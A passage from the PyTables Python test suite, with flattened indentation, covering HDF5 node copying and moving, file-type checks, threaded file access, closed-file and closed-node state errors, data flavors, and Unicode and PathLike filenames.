self.h5file.root, h5file2.root, recursive=True)
dstNode = h5file2.root
self.assertIs(new_node, dstNode)
self.assertIn("/agroup", h5file2)
self.assertIn("/agroup/anarray1", h5file2)
self.assertIn("/agroup/agroup3", h5file2)
finally:
h5file2.close()
os.remove(h5fname2)
def test13f_copyRootRecursive(self):
"""Recursively copying the root group into a group in another file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
h5file2.create_group('/', 'agroup2')
# fileh.root => h5file2.root.agroup2
new_node = self.h5file.copy_node(
self.h5file.root, h5file2.root.agroup2, recursive=True)
dstNode = h5file2.root.agroup2
self.assertIs(new_node, dstNode)
self.assertIn("/agroup2/agroup", h5file2)
self.assertIn("/agroup2/agroup/anarray1", h5file2)
self.assertIn("/agroup2/agroup/agroup3", h5file2)
finally:
h5file2.close()
os.remove(h5fname2)
def test13g_copyRootItself(self):
"""Recursively copying the root group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
agroup2 = self.h5file.root
self.assertIsNotNone(agroup2)
# h5file.root => h5file.root
self.assertRaises(IOError, self.h5file.copy_node,
self.h5file.root, self.h5file.root, recursive=True)
def test14a_copyNodeExisting(self):
"""Copying over an existing node."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup2 => agroup
self.h5file.copy_node(self.h5file.root.agroup2, newname='agroup')
def test14b_copyNodeExistingOverwrite(self):
"""Copying over an existing node, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
newname='agroup', overwrite=True)
dstNode = self.h5file.root.agroup
self.assertIs(new_node, dstNode)
def test14b2_copyNodeExistingOverwrite(self):
"""Copying over an existing node in other file, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# file1:/anarray1 => h5fname2:/anarray1
new_node = self.h5file.copy_node(self.h5file.root.agroup.anarray1,
newparent=h5file2.root)
# file1:/ => h5fname2:/
new_node = self.h5file.copy_node(self.h5file.root, h5file2.root,
overwrite=True, recursive=True)
dstNode = h5file2.root
self.assertIs(new_node, dstNode)
finally:
h5file2.close()
os.remove(h5fname2)
def test14c_copyNodeExistingSelf(self):
"""Copying over self."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup
self.h5file.copy_node(self.h5file.root.agroup, newname='agroup')
def test14d_copyNodeExistingOverwriteSelf(self):
"""Copying over self, trying to overwrite."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup
self.h5file.copy_node(
self.h5file.root.agroup, newname='agroup', overwrite=True)
def test14e_copyGroupSelfRecursive(self):
"""Recursively copying a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup/
self.h5file.copy_node(self.h5file.root.agroup,
self.h5file.root.agroup, recursive=True)
def test15a_oneStepMove(self):
"""Moving and renaming a node in a single action."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# anarray1 -> agroup/array
srcNode = self.h5file.root.anarray1
self.h5file.move_node(srcNode, self.h5file.root.agroup, 'array')
dstNode = self.h5file.root.agroup.array
self.assertIs(srcNode, dstNode)
def test15b_oneStepCopy(self):
"""Copying and renaming a node in a single action."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# anarray1 => agroup/array
new_node = self.h5file.copy_node(
self.h5file.root.anarray1, self.h5file.root.agroup, 'array')
dstNode = self.h5file.root.agroup.array
self.assertIs(new_node, dstNode)
def test16a_fullCopy(self):
"""Copying full data and user attributes."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => groupcopy
srcNode = self.h5file.root.agroup
new_node = self.h5file.copy_node(
srcNode, newname='groupcopy', recursive=True)
dstNode = self.h5file.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertEqual(srcNode._v_attrs.testattr, dstNode._v_attrs.testattr)
self.assertEqual(
srcNode.anarray1.attrs.testattr, dstNode.anarray1.attrs.testattr)
self.assertEqual(srcNode.anarray1.read(), dstNode.anarray1.read())
def test16b_partialCopy(self):
"""Copying partial data and no user attributes."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => groupcopy
srcNode = self.h5file.root.agroup
new_node = self.h5file.copy_node(
srcNode, newname='groupcopy',
recursive=True, copyuserattrs=False,
start=0, stop=5, step=2)
dstNode = self.h5file.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertFalse(hasattr(dstNode._v_attrs, 'testattr'))
self.assertFalse(hasattr(dstNode.anarray1.attrs, 'testattr'))
self.assertEqual(srcNode.anarray1.read()[
0:5:2], dstNode.anarray1.read())
def test16c_fullCopy(self):
"""Copying full data and user attributes (from file to file)."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# file1:/ => h5fname2:groupcopy
srcNode = self.h5file.root
new_node = self.h5file.copy_node(
srcNode, h5file2.root, newname='groupcopy', recursive=True)
dstNode = h5file2.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertEqual(srcNode._v_attrs.testattr,
dstNode._v_attrs.testattr)
self.assertEqual(
srcNode.agroup.anarray1.attrs.testattr,
dstNode.agroup.anarray1.attrs.testattr)
self.assertEqual(srcNode.agroup.anarray1.read(),
dstNode.agroup.anarray1.read())
finally:
h5file2.close()
os.remove(h5fname2)
def test17a_CopyChunkshape(self):
"""Copying dataset with a chunkshape."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape=11)
self.assertEqual(newTable.chunkshape, (11,))
self.assertNotEqual(srcTable.chunkshape, newTable.chunkshape)
def test17b_CopyChunkshape(self):
"""Copying dataset with a chunkshape with 'keep' value."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape='keep')
self.assertEqual(srcTable.chunkshape, newTable.chunkshape)
def test17c_CopyChunkshape(self):
"""Copying dataset with a chunkshape with 'auto' value."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape=11)
newTable2 = self.h5file.copy_node(
newTable, newname='tablecopy2', chunkshape='auto')
self.assertEqual(srcTable.chunkshape, newTable2.chunkshape)
def test18_closedRepr(self):
"""Representing a closed node as a string."""
self._reopen(node_cache_slots=self.node_cache_slots)
for node in [self.h5file.root.agroup, self.h5file.root.anarray]:
node._f_close()
self.assertIn('closed', str(node))
self.assertIn('closed', repr(node))
def test19_fileno(self):
"""Checking that the 'fileno()' method works."""
# Open the old HDF5 file
self._reopen(mode="r", node_cache_slots=self.node_cache_slots)
# Get the file descriptor for this file
fd = self.h5file.fileno()
if common.verbose:
print("Value of fileno():", fd)
self.assertGreaterEqual(fd, 0)
class NodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = NODE_CACHE_SLOTS
open_kwargs = dict(node_cache_slots=node_cache_slots)
class NoNodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = 0
open_kwargs = dict(node_cache_slots=node_cache_slots)
class DictNodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = -NODE_CACHE_SLOTS
open_kwargs = dict(node_cache_slots=node_cache_slots)
class CheckFileTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(CheckFileTestCase, self).setUp()
# Create a regular (text) file
self.txtfile = tempfile.mktemp(".h5")
self.fileh = open(self.txtfile, "w")
self.fileh.write("Hello!")
self.fileh.close()
def tearDown(self):
self.fileh.close()
os.remove(self.txtfile)
super(CheckFileTestCase, self).tearDown()
def test00_isHDF5File(self):
"""Checking tables.is_hdf5_file function (TRUE case)"""
# Create a PyTables file (and by so, an HDF5 file)
self.h5file.create_array(self.h5file.root, 'array', [1, 2],
title="Title example")
# For this method to run, it needs a closed file
self.h5file.close()
# When file has an HDF5 format, always returns 1
if common.verbose:
print("\nisHDF5File(%s) ==> %d" % (
self.h5fname, tables.is_hdf5_file(self.h5fname)))
self.assertEqual(tables.is_hdf5_file(self.h5fname), 1)
def test01_isHDF5File(self):
"""Checking tables.is_hdf5_file function (FALSE case)"""
version = tables.is_hdf5_file(self.txtfile)
# When file is not an HDF5 format, always returns 0 or
# negative value
self.assertLessEqual(version, 0)
def test01x_isHDF5File_nonexistent(self):
"""Identifying a nonexistent HDF5 file."""
self.assertRaises(IOError, tables.is_hdf5_file, 'nonexistent')
@unittest.skipUnless(hasattr(os, 'getuid') and os.getuid() != 0, "no UID")
def test01x_isHDF5File_unreadable(self):
"""Identifying an unreadable HDF5 file."""
self.h5file.close()
os.chmod(self.h5fname, 0) # no permissions at all
self.assertRaises(IOError, tables.is_hdf5_file, self.h5fname)
def test02_isPyTablesFile(self):
"""Checking is_pytables_file function (TRUE case)"""
# Create a PyTables h5fname
self.h5file.create_array(self.h5file.root, 'array',
[1, 2], title="Title example")
# For this method to run, it needs a closed h5fname
self.h5file.close()
version = tables.is_pytables_file(self.h5fname)
# When h5fname has a PyTables format, always returns "1.0" string or
# greater
if common.verbose:
print()
print("\nPyTables format version number ==> %s" % version)
self.assertGreaterEqual(version, "1.0")
def test03_isPyTablesFile(self):
"""Checking is_pytables_file function (FALSE case)"""
version = tables.is_pytables_file(self.txtfile)
# When file is not a PyTables format, always returns 0 or
# negative value
if common.verbose:
print()
print("\nPyTables format version number ==> %s" % version)
self.assertIsNone(version)
def test04_openGenericHDF5File(self):
"""Checking opening of a generic HDF5 file."""
# Open an existing generic HDF5 file
h5fname = test_filename("ex-noattr.h5")
with tables.open_file(h5fname, mode="r") as h5file:
# Check for some objects inside
# A group
columns = h5file.get_node("/columns", classname="Group")
self.assertEqual(columns._v_name, "columns")
# An Array
array_ = h5file.get_node(columns, "TDC", classname="Array")
self.assertEqual(array_._v_name, "TDC")
# The new LRU code defers the appearance of a warning to this point
# Here comes an Array of H5T_ARRAY type
ui = h5file.get_node(columns, "pressure", classname="Array")
self.assertEqual(ui._v_name, "pressure")
if common.verbose:
print("Array object with type H5T_ARRAY -->", repr(ui))
print("Array contents -->", ui[:])
# A Table
table = h5file.get_node("/detector", "table", classname="Table")
self.assertEqual(table._v_name, "table")
def test04b_UnImplementedOnLoading(self):
"""Checking failure loading resulting in an ``UnImplemented`` node."""
############### Note for developers ###############################
# This test fails if you have the line: #
# ##return ChildClass(self, childname) # uncomment for debugging #
# uncommented in Group.py! #
###################################################################
h5fname = test_filename('smpl_unsupptype.h5')
with tables.open_file(h5fname) as h5file:
with self.assertWarns(UserWarning):
node = h5file.get_node('/CompoundChunked')
self.assertIsInstance(node, UnImplemented)
def test04c_UnImplementedScalar(self):
"""Checking opening of HDF5 files containing scalar dataset of
UnImlemented type."""
with tables.open_file(test_filename("scalar.h5")) as h5file:
with self.assertWarns(UserWarning):
node = h5file.get_node('/variable length string')
self.assertIsInstance(node, UnImplemented)
def test05_copyUnimplemented(self):
"""Checking that an UnImplemented object cannot be copied."""
# Open an existing generic HDF5 file
h5fname = test_filename("smpl_unsupptype.h5")
with tables.open_file(h5fname, mode="r") as h5file:
self.assertWarns(UserWarning, h5file.get_node, '/CompoundChunked')
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ui = h5file.get_node('/CompoundChunked')
self.assertEqual(ui._v_name, 'CompoundChunked')
if common.verbose:
print("UnImplement object -->", repr(ui))
# Check that it cannot be copied to another file:
self.assertWarns(UserWarning, ui.copy, self.h5file.root, "newui")
# The next can be used to check the copy of Array objects with H5T_ARRAY
# in the future
def _test05_copyUnimplemented(self):
"""Checking that an UnImplemented object cannot be copied."""
# Open an existing generic HDF5 file
# We don't need to wrap this in a try clause because
# it has already been tried and the warning will not happen again
h5fname2 = test_filename("ex-noattr.h5")
with tables.open_file(h5fname2, mode="r") as h5file2:
# An unsupported object (the deprecated H5T_ARRAY type in
# Array, from pytables 0.8 on)
ui = h5file2.get_node(h5file2.root.columns, "pressure")
self.assertEqual(ui._v_name, "pressure")
if common.verbose:
print("UnImplement object -->", repr(ui))
# Check that it cannot be copied to another file
with warnings.catch_warnings():
# Force the userwarning to issue an error
warnings.filterwarnings("error", category=UserWarning)
with self.assertRaises(UserWarning):
ui.copy(self.h5file.root, "newui")
@unittest.skipIf((os.name == 'nt' and sys.version_info < (3,))
or tables.file._FILE_OPEN_POLICY == 'strict',
'FILE_OPEN_POLICY = "strict"')
class ThreadingTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(ThreadingTestCase, self).setUp()
self.h5file.create_carray('/', 'test_array', tables.Int64Atom(),
(200, 300))
self.h5file.close()
def test(self):
lock = threading.Lock()
def syncronized_open_file(*args, **kwargs):
with lock:
return tables.open_file(*args, **kwargs)
def syncronized_close_file(self, *args, **kwargs):
with lock:
return self.close(*args, **kwargs)
filename = self.h5fname
def run(filename, q):
try:
f = syncronized_open_file(filename, mode='r')
arr = f.root.test_array[8:12, 18:22]
assert arr.max() == arr.min() == 0
syncronized_close_file(f)
except Exception:
q.put(sys.exc_info())
else:
q.put('OK')
threads = []
q = queue.Queue()
for i in range(10):
t = threading.Thread(target=run, args=(filename, q))
t.start()
threads.append(t)
for i in range(10):
self.assertEqual(q.get(), 'OK')
for t in threads:
t.join()
class PythonAttrsTestCase(common.TempFileMixin, TestCase):
"""Test interactions of Python attributes and child nodes."""
def test00_attrOverChild(self):
"""Setting a Python attribute over a child node."""
root = self.h5file.root
# Create ``/test`` and overshadow it with ``root.test``.
child = self.h5file.create_array(root, 'test', [1])
attr = 'foobar'
self.assertWarns(NaturalNameWarning, setattr, root, 'test', attr)
self.assertIs(root.test, attr)
self.assertIs(root._f_get_child('test'), child)
# Now bring ``/test`` again to light.
del root.test
self.assertIs(root.test, child)
# Now there is no *attribute* named ``test``.
self.assertRaises(AttributeError,
delattr, root, 'test')
def test01_childUnderAttr(self):
"""Creating a child node under a Python attribute."""
h5file = self.h5file
root = h5file.root
# Create ``root.test`` and an overshadowed ``/test``.
attr = 'foobar'
root.test = attr
self.assertWarns(NaturalNameWarning,
h5file.create_array, root, 'test', [1])
child = h5file.get_node('/test')
self.assertIs(root.test, attr)
self.assertIs(root._f_get_child('test'), child)
# Now bring ``/test`` again to light.
del root.test
self.assertIs(root.test, child)
# Now there is no *attribute* named ``test``.
self.assertRaises(AttributeError, delattr, root, 'test')
def test02_nodeAttrInLeaf(self):
"""Assigning a ``Node`` value as an attribute to a ``Leaf``."""
h5file = self.h5file
array1 = h5file.create_array('/', 'array1', [1])
array2 = h5file.create_array('/', 'array2', [1])
# This may make the garbage collector work a little.
array1.array2 = array2
array2.array1 = array1
# Check the assignments.
self.assertIs(array1.array2, array2)
self.assertIs(array2.array1, array1)
self.assertRaises(NoSuchNodeError, # ``/array1`` is not a group
h5file.get_node, '/array1/array2')
self.assertRaises(NoSuchNodeError, # ``/array2`` is not a group
h5file.get_node, '/array2/array3')
def test03_nodeAttrInGroup(self):
"""Assigning a ``Node`` value as an attribute to a ``Group``."""
h5file = self.h5file
root = h5file.root
array = h5file.create_array('/', 'array', [1])
# Assign the array to a pair of attributes,
# one of them overshadowing the original.
root.arrayAlias = array
self.assertWarns(NaturalNameWarning, setattr, root, 'array', array)
# Check the assignments.
self.assertIs(root.arrayAlias, array)
self.assertIs(root.array, array)
self.assertRaises(NoSuchNodeError, h5file.get_node, '/arrayAlias')
self.assertIs(h5file.get_node('/array'), array)
# Remove the attribute overshadowing the child.
del root.array
# Now there is no *attribute* named ``array``.
self.assertRaises(AttributeError, delattr, root, 'array')
class StateTestCase(common.TempFileMixin, TestCase):
"""Test that ``File`` and ``Node`` operations check their state (open or
closed, readable or writable) before proceeding."""
def test00_fileCopyFileClosed(self):
"""Test copying a closed file."""
self.h5file.close()
h5cfname = tempfile.mktemp(suffix='.h5')
try:
self.assertRaises(ClosedFileError,
self.h5file.copy_file, h5cfname)
finally:
if os.path.exists(h5cfname):
os.remove(h5cfname)
def test01_fileCloseClosed(self):
"""Test closing an already closed file."""
self.h5file.close()
try:
self.h5file.close()
except ClosedFileError:
self.fail("could not close an already closed file")
def test02_fileFlushClosed(self):
"""Test flushing a closed file."""
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.flush)
def test03_fileFlushRO(self):
"""Flushing a read-only file."""
self._reopen('r')
try:
self.h5file.flush()
except FileModeError:
self.fail("could not flush a read-only file")
def test04_fileCreateNodeClosed(self):
"""Test creating a node in a closed file."""
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.create_group, '/', 'test')
def test05_fileCreateNodeRO(self):
"""Test creating a node in a read-only file."""
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.create_group, '/', 'test')
def test06_fileRemoveNodeClosed(self):
"""Test removing a node from a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.remove_node, '/', 'test')
def test07_fileRemoveNodeRO(self):
"""Test removing a node from a read-only file."""
self.h5file.create_group('/', 'test')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.remove_node, '/', 'test')
def test08_fileMoveNodeClosed(self):
"""Test moving a node in a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.move_node, '/test1', '/', 'test2')
def test09_fileMoveNodeRO(self):
"""Test moving a node in a read-only file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.move_node, '/test1', '/', 'test2')
def test10_fileCopyNodeClosed(self):
"""Test copying a node in a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.copy_node, '/test1', '/', 'test2')
def test11_fileCopyNodeRO(self):
"""Test copying a node in a read-only file."""
self.h5file.create_group('/', 'test1')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.copy_node, '/test1', '/', 'test2')
def test13_fileGetNodeClosed(self):
"""Test getting a node from a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.get_node, '/test')
def test14_fileWalkNodesClosed(self):
"""Test walking a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError, next, self.h5file.walk_nodes())
def test15_fileAttrClosed(self):
"""Test setting and deleting a node attribute in a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.set_node_attr, '/test', 'foo', 'bar')
self.assertRaises(ClosedFileError,
self.h5file.del_node_attr, '/test', 'foo')
def test16_fileAttrRO(self):
"""Test setting and deleting a node attribute in a read-only file."""
self.h5file.create_group('/', 'test')
self.h5file.set_node_attr('/test', 'foo', 'foo')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.set_node_attr, '/test', 'foo', 'bar')
self.assertRaises(FileModeError,
self.h5file.del_node_attr, '/test', 'foo')
def test17_fileUndoClosed(self):
"""Test undo operations in a closed file."""
self.h5file.enable_undo()
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.is_undo_enabled)
self.assertRaises(ClosedFileError, self.h5file.get_current_mark)
self.assertRaises(ClosedFileError, self.h5file.undo)
self.assertRaises(ClosedFileError, self.h5file.disable_undo)
def test18_fileUndoRO(self):
"""Test undo operations in a read-only file."""
self.h5file.enable_undo()
self.h5file.create_group('/', 'test')
self._reopen('r')
self.assertEqual(self.h5file._undoEnabled, False)
# self.assertRaises(FileModeError, self.h5file.undo)
# self.assertRaises(FileModeError, self.h5file.disable_undo)
def test19a_getNode(self):
"""Test getting a child of a closed node."""
g1 = self.h5file.create_group('/', 'g1')
g2 = self.h5file.create_group('/g1', 'g2')
# Close this *object* so that it should not be used.
g1._f_close()
self.assertRaises(ClosedNodeError, g1._f_get_child, 'g2')
# Getting a node by its closed object is not allowed.
self.assertRaises(ClosedNodeError,
self.h5file.get_node, g1)
# Going through that *node* should reopen it automatically.
try:
g2_ = self.h5file.get_node('/g1/g2')
except ClosedNodeError:
self.fail("closed parent group has not been reopened")
# Already open nodes should be closed now, but not the new ones.
self.assertIs(g2._v_isopen, False,
"open child of closed group has not been closed")
self.assertIs(g2_._v_isopen, True,
"open child of closed group has not been closed")
# And existing closed ones should remain closed, but not the new ones.
g1_ = self.h5file.get_node('/g1')
self.assertIs(g1._v_isopen, False,
"already closed group is not closed anymore")
self.assertIs(g1_._v_isopen, True,
"newly opened group is still closed")
def test19b_getNode(self):
"""Test getting a node that does not start with a slash ('/')."""
# Create an array in the root
self.h5file.create_array('/', 'array', [1, 2], title="Title example")
# Get the array without specifying a leading slash
self.assertRaises(NameError, self.h5file.get_node, "array")
def test20_removeNode(self):
"""Test removing a closed node."""
# This test is a little redundant once we know that ``File.get_node()``
# will reload a closed node, but anyway...
group = self.h5file.create_group('/', 'group')
array = self.h5file.create_array('/group', 'array', [1])
# The closed *object* can not be used.
group._f_close()
self.assertRaises(ClosedNodeError, group._f_remove)
self.assertRaises(ClosedNodeError, self.h5file.remove_node, group)
# Still, the *node* is reloaded when necessary.
try:
self.h5file.remove_node('/group', recursive=True)
except ClosedNodeError:
self.fail("closed node has not been reloaded")
# Objects of descendent removed nodes
# should have been automatically closed when removed.
self.assertRaises(ClosedNodeError, array._f_remove)
self.assertNotIn('/group/array', self.h5file) # just in case
self.assertNotIn('/group', self.h5file) # just in case
def test21_attrsOfNode(self):
"""Test manipulating the attributes of a closed node."""
node = self.h5file.create_group('/', 'test')
nodeAttrs = node._v_attrs
nodeAttrs.test = attr = 'foo'
node._f_close()
self.assertRaises(ClosedNodeError, getattr, node, '_v_attrs')
# The design of ``AttributeSet`` does not yet allow this test.
## self.assertRaises(ClosedNodeError, getattr, nodeAttrs, 'test')
self.assertEqual(self.h5file.get_node_attr('/test', 'test'), attr)
def test21b_attrsOfNode(self):
"""Test manipulating the attributes of a node in a read-only file."""
self.h5file.create_group('/', 'test')
self.h5file.set_node_attr('/test', 'test', 'foo')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.set_node_attr, '/test', 'test', 'bar')
def test22_fileClosesNode(self):
"""Test node closing because of file closing."""
node = self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedNodeError, getattr, node, '_v_attrs')
def test23_reopenFile(self):
"""Testing reopening a file and closing it several times."""
self.h5file.create_array('/', 'test', [1, 2, 3])
self.h5file.close()
with tables.open_file(self.h5fname, "r") as h5file1:
self.assertEqual(h5file1.open_count, 1)
if tables.file._FILE_OPEN_POLICY == 'strict':
self.assertRaises(ValueError,
tables.open_file, self.h5fname, "r")
else:
with tables.open_file(self.h5fname, "r") as h5file2:
self.assertEqual(h5file1.open_count, 1)
self.assertEqual(h5file2.open_count, 1)
if common.verbose:
print("(h5file1) open_count:", h5file1.open_count)
print("(h5file1) test[1]:", h5file1.root.test[1])
self.assertEqual(h5file1.root.test[1], 2)
h5file1.close()
self.assertEqual(h5file2.open_count, 1)
if common.verbose:
print("(h5file2) open_count:", h5file2.open_count)
print("(h5file2) test[1]:", h5file2.root.test[1])
self.assertEqual(h5file2.root.test[1], 2)
class FlavorTestCase(common.TempFileMixin, TestCase):
"""Test that setting, getting and changing the ``flavor`` attribute of a
leaf works as expected."""
array_data = numpy.arange(10)
scalar_data = numpy.int32(10)
def _reopen(self, mode='r'):
super(FlavorTestCase, self)._reopen(mode)
self.array = self.h5file.get_node('/array')
self.scalar = self.h5file.get_node('/scalar')
return True
def setUp(self):
super(FlavorTestCase, self).setUp()
self.array = self.h5file.create_array('/', 'array', self.array_data)
self.scalar = self.h5file.create_array('/', 'scalar', self.scalar_data)
def test00_invalid(self):
"""Setting an invalid flavor."""
self.assertRaises(FlavorError, setattr, self.array, 'flavor', 'foo')
def test01_readonly(self):
"""Setting a flavor in a read-only file."""
self._reopen(mode='r')
self.assertRaises(FileModeError,
setattr, self.array, 'flavor',
tables.flavor.internal_flavor)
def test02_change(self):
"""Changing the flavor and reading data."""
for flavor in all_flavors:
self.array.flavor = flavor
self.assertEqual(self.array.flavor, flavor)
idata = array_of_flavor(self.array_data, flavor)
odata = self.array[:]
self.assertTrue(common.allequal(odata, idata, flavor))
def test03_store(self):
"""Storing a changed flavor."""
for flavor in all_flavors:
self.array.flavor = flavor
self.assertEqual(self.array.flavor, flavor)
self._reopen(mode='r+')
self.assertEqual(self.array.flavor, flavor)
def test04_missing(self):
"""Reading a dataset of a missing flavor."""
flavor = self.array.flavor # default is internal
self.array._v_attrs.FLAVOR = 'foobar' # breaks flavor
self._reopen(mode='r')
idata = array_of_flavor(self.array_data, flavor)
with self.assertWarns(FlavorWarning):
odata = self.array.read()
self.assertTrue(common.allequal(odata, idata, flavor))
def test05_delete(self):
"""Deleting the flavor of a dataset."""
self.array.flavor = 'python' # non-default
self.assertEqual(self.array.flavor, 'python')
self.assertEqual(self.array.attrs.FLAVOR, 'python')
del self.array.flavor
self.assertEqual(self.array.flavor, tables.flavor.internal_flavor)
self.assertRaises(AttributeError, getattr, self.array.attrs, 'FLAVOR')
def test06_copyDeleted(self):
"""Copying a node with a deleted flavor (see #100)."""
snames = [node._v_name for node in [self.array, self.scalar]]
dnames = ['%s_copy' % name for name in snames]
for name in snames:
node = self.h5file.get_node('/', name)
del node.flavor
# Check the copied flavors right after copying and after reopening.
for fmode in ['r+', 'r']:
self._reopen(fmode)
for sname, dname in zip(snames, dnames):
if fmode == 'r+':
snode = self.h5file.get_node('/', sname)
node = snode.copy('/', dname)
elif fmode == 'r':
node = self.h5file.get_node('/', dname)
self.assertEqual(node.flavor, tables.flavor.internal_flavor,
"flavor of node ``%s`` is not internal: %r"
% (node._v_pathname, node.flavor))
def test07_restrict_flavors(self):
# regression test for gh-163
all_flavors = list(tables.flavor.all_flavors)
alias_map = tables.flavor.alias_map.copy()
converter_map = tables.flavor.converter_map.copy()
identifier_map = tables.flavor.identifier_map.copy()
description_map = tables.flavor.description_map.copy()
try:
tables.flavor.restrict_flavors(keep=[])
self.assertLess(len(tables.flavor.alias_map), len(alias_map))
self.assertLess(
len(tables.flavor.converter_map),
len(converter_map))
finally:
tables.flavor.all_flavors[:] = all_flavors[:]
tables.flavor.alias_map.update(alias_map)
tables.flavor.converter_map.update(converter_map)
tables.flavor.identifier_map.update(identifier_map)
tables.flavor.description_map.update(description_map)
@unittest.skipIf('win' in platform.system().lower(), 'known bug: gh-389')
@unittest.skipIf(sys.getfilesystemencoding() != 'utf-8',
'need utf-8 file-system encoding')
class UnicodeFilename(common.TempFileMixin, TestCase):
unicode_prefix = u'para\u0140lel'
def _getTempFileName(self):
return tempfile.mktemp(prefix=self.unicode_prefix, suffix='.h5')
def setUp(self):
super(UnicodeFilename, self).setUp()
self.test = self.h5file.create_array('/', 'test', [1, 2])
# So as to check the reading
self._reopen()
def test01(self):
"""Checking creating a filename with Unicode chars."""
test = self.h5file.root.test
if common.verbose:
print("Filename:", self.h5fname)
print("Array:", test[:])
print("Should look like:", [1, 2])
self.assertEqual(test[:], [1, 2], "Values does not match.")
def test02(self):
"""Checking tables.is_hdf5_file with a Unicode filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print(" tables.is_hdf5_file?:", tables.is_hdf5_file(self.h5fname))
self.assertTrue(tables.is_hdf5_file(self.h5fname))
def test03(self):
"""Checking is_pytables_file with a Unicode filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print("is_pytables_file?:", tables.is_pytables_file(self.h5fname))
self.assertNotEqual(tables.is_pytables_file(self.h5fname), False)
@staticmethod
def _store_carray(name, data, group):
atom = tables.Atom.from_dtype(data.dtype)
node = tables.CArray(group, name, shape=data.shape, atom=atom)
node[:] = data
def test_store_and_load_with_non_ascii_attributes(self):
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, "a")
root = self.h5file.root
group = self.h5file.create_group(root, 'face_data')
array_name = u'data at 40\N{DEGREE SIGN}C'
data = numpy.sinh(numpy.linspace(-1.4, 1.4, 500))
with warnings.catch_warnings():
warnings.simplefilter('ignore', NaturalNameWarning)
self._store_carray(array_name, data, group)
group = self.h5file.create_group(root, 'vertex_data')
@unittest.skipIf(sys.version_info < (3, 6),
'PEP 519 was implemented in Python 3.6')
class PathLikeFilename(common.TempFileMixin, TestCase):
def _getTempFileName(self):
from pathlib import Path
return Path(tempfile.mktemp(suffix='.h5'))
def setUp(self):
super(PathLikeFilename, self).setUp()
self.test = self.h5file.create_array('/', 'test', [1, 2])
# So as to check the reading
self._reopen()
def test01(self):
"""Checking creating a file with a PathLike object as the filename."""
test = self.h5file.root.test
if common.verbose:
print("Filename:", self.h5fname)
print("Array:", test[:])
print("Should look like:", [1, 2])
self.assertEqual(test[:], [1, 2], "Values does not match.")
def test02(self):
"""Checking tables.is_hdf5_file with a PathLike object as the filename."""
self.h5file.close()
if common.verbose:
print("Filename:", self.h5fname)
print(" tables.is_hdf5_file?:", tables.is_hdf5_file(self.h5fname))
self.assertTrue(tables.is_hdf5_file(self.h5fname))
def test03(self):
"""Checking is_pytables_file with a PathLike object as the filename."""
self.h5file.close()
if common.verbose:
